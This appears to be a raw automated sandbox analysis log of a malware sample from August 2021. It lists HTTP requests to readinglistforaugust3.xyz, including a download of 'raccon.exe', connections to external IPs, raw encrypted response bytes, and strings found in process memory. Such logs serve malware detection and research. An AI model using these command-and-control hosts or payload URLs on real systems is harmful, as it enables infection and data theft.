Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /raccon.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /5.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.49.70.90:2080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: readinglistforaugust3.xyz

Source: unknown

Network traffic detected: DNS query count 135

Source: global traffic	TCP traffic: 192.168.2.7:49718 -> 185.230.143.48:14462
Source: global traffic	TCP traffic: 192.168.2.7:49720 -> 185.49.70.90:2080

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Aug 2021 06:46:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=3Vary: Accept-EncodingData Raw: 33 66 66 36 36 0d 0a 19 00 00 00 0f ca 2f 84 77 38 03 07 60 d2 80 a2 bd 69 d9 2a 54 11 f9 3f 11 11 69 c6 03 00 ca e6 04 00 01 d0 ea 5b 01 07 01 00 09 00 9c 03 00 00 9f 24 2b 84 9b 15 0f 1b 8d 31 3e 1f 89 00 1a 00 9a 9e 36 eb 35 c6 1f 1b 28 74 b4 ea e8 ba a8 25 a8 83 82 1b 73 98 df ea a8 d4 7e 16 a7 ef 2c 3e c2 32 14 ea be ef 24 3e 44 3a 13 90 7d 7e 96 3b 32 55 c2 af b2 7b 11 87 ff 09 93 b8 0e 89 4b 95 cb 9a bb 7e 96 48 44 e1 80 c2 33 8f c5 d0 d9 53 6d 17 df f2 e8 40 70 c8 8c 5b a2 7d 08 fb 77 ac b1 da 74 68 df 2b 53 27 b4 4d 72 56 b6 6f 03 90 e0 b7 2e bd 97 54 51 d0 24 c3 4a ff 42 97 9f a3 7e 79 5d 43 0d c5 83 80 6a 74 a6 9b 8d 69 d5 01 98 3e 25 7d c0 5c 60 26 0e 9f 7d 03 0a f7 f8 bd 9a 54 e0 ee 28 f7 34 f4 2f d0 8c 1e 0c 81 10 65 a1 bd 57 6f a5 98 bb b7 84 ef a1 b2 95 45 71 c2 0e c2 db ce de df 0d 32 48 57 a1 05 14 7e e4 f3 6d 49 73 a4 95 73 72 7e 2f 8c 8d df bc ae af 30 1b ae 49 95 a1 e1 82 bf c9 5c 5c 1e ea ec be 4a 0e 4d 26 50 4d a1 0f 25 77 b9 78 a7 a3 e4 48 f3 77 68 be 20 f2 7f b2 8b 88 bb 1f a1 28 57 50 e1 f4 60 cb 93 bf 5a 5e 7f 5d 54 b6 04 a6 3f fd 8a 05 83 18 e7 4c 8e d0 16 e2 c2 c8 9c e0 de 7c 62 9d fc 80 0b 82 d3 1a 9a b7 3d 67 c1 c7 09 b0 da 98 f4 df a6 e2 bf 34 64 06 bd cc 4b 23 5d b2 f6 90 1a 5e 08 07 8b e1 b4 d7 b1 87 4f 0a 40 85 48 44 9d 22 6c d2 e4 64 30 e5 28 45 d7 b7 95 6f 44 6d 98 4f f7 24 09 b9 cd c5 78 d4 b9 26 5f fe 35 ae 11 99 71 e2 8e a1 6c 28 f7 8f ef 97 a0 4d 1b 8c b6 b4 d0 76 f4 2c 5b 7d 92 dd 01 a7 1e ec c1 19 e6 ca ca ab 84 31 b4 be c5 d6 c6 2b cc 67 14 cf 59 cb 79 4e c7 cd 9e a3 e0 13 8d 90 65 b7 d2 4c 1f 71 bc 21 5e 7e f5 1b ca a3 a7 59 e4 af f4 03 e1 e7 d4 0c 7d 8f 06 8d 47 10 b0 b5 c5 0a 91 e3 74 92 3b e0 3a 5f 81 e4 ca 30 53 48 2b 7c ce 8f a6 21 61 85 16 7a 1d 4c 83 ed 89 18 08 96 38 8a b2 74 70 5e 90 e5 f0 9a 0e 54 32 1b ff be 50 40 27 48 81 b0 b0 d2 44 2f a9 82 63 2b 40 34 ac e0 5a 84 7c da e9 4e fc 17 5a 66 70 00 11 e3 d1 e2 79 47 1a 8d b4 00 b0 db 14 e8 54 94 38 23 e6 d9 94 3d 42 13 2a f9 af 54 f1 d8 f7 b4 0f 6e c0 03 2b 57 dc da 77 02 5a 65 e0 66 91 02 29 ed b2 cc 4c 8f 21 d3 9c 04 d0 86 e1 7d b9 cc ff ae b5 75 2b c6 8a 7b 79 3e 20 d3 cc ed a9 48 4b 8b 40 dc 74 94 a9 4d 5b ef 95 f5 82 73 8c 44 c1 9f 4a 5d 1d 30 c6 2a 97 99 d4 a2 9c 2c 25 57 d1 39 a6 c5 df ff 04 8e c4 79 3f 20 01 53 02 d1 69 3a 77 0f 2c 71 f4 95 d4 73 ae 8a 22 30 6f 21 40 5b e5 1d b6 7c 14 52 ba 02 65 cc f4 45 93 f6 4f f6 e6 e2 57 c7 20 13 ea dc 43 ab dc ba f5 a4 04 99 c9 71 fd a8 17 1e 54 40 8e 8c 73 90 f5 b5 c0 f6 c4 5a d8 ce f7 9a 4b 90 ec ea 10 27 d9 62 02 b7 d2 5a bb 08 fb 19 27 87 f0 12 4e e0 4a 1a 46 c4 09 d9 cb a1 b9 27 d8 1d 95 7a c6 78 12 a8 2e fd 61 dd 7f ed 3e a2 8d f3 ae bd a3 b6 67 0c ac ee 95 f1 13 a2 1a c3 3d fe 66 ca 45 34 c6 65 67 ca 4c 79 d1 f1 b4 74 8d 7e e3 da b7 8a 9c 02 dd e5 f6 5f c8 f9 c6 61 bc a

Source: svchost.exe, 00000013.00000002.376076543.0000020C47213000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.c
Source: svchost.exe, 00000013.00000002.376806705.0000020C47B47000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000013.00000002.376806705.0000020C47B47000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: svchost.exe, 00000013.00000002.376674058.0000020C47990000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.531510582.000001F8D7612000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000013.00000002.376674058.0000020C47990000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: svchost.exe, 00000013.00000002.376806705.0000020C47B47000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000006.00000002.531510582.000001F8D7612000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000006.00000002.531490727.000001F8D7600000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000006.00000002.530157711.000001F8D75A0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: C481.exe, 0000001C.00000002.527464159.0000000003142000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: C481.exe	String found in binary or memory: http://secureteam.net/ErrorReporting.asmx
Source: C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/CreateErrorReport
Source: C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/T
Source: C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/TU
Source: C481.exe, 0000001C.00000000.401898853.0000000000C52000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/Y
Source: C481.exe, 0000001C.00000002.524470286.0000000002FF4000.00000004.00000001.sdmp	String found in binary or memory: http://swretjhwrtj.gqx
Source: C481.exe, 0000001C.00000002.527574653.0000000003158000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: C481.exe, 0000001C.00000002.527574653.0000000003158000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: C481.exe, 0000001C.00000002.527605246.0000000003160000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.278191049.0000000006870000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: svchost.exe, 0000000D.00000002.314293390.000002BED9A13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.289884370.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: C481.exe, 0000001C.00000002.527630873.0000000003164000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb
Source: C481.exe, 0000001C.00000002.527630873.0000000003164000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: C481.exe, 0000001C.00000002.543587785.0000000012FB8000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: C481.exe, 0000001C.00000002.527630873.0000000003164000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sbx
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000D.00000003.311848561.000002BED9A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000002.314485514.000002BED9A4D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000D.00000002.314459845.000002BED9A42000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000D.00000002.314459845.000002BED9A42000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000002.314520525.000002BED9A5D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000D.00000003.311848561.000002BED9A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000002.314520525.000002BED9A5D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000D.00000002.314520525.000002BED9A5D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000D.00000002.314546935.000002BED9A64000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000D.00000003.311777509.000002BED9A60000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.289909839.000002BED9A31000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
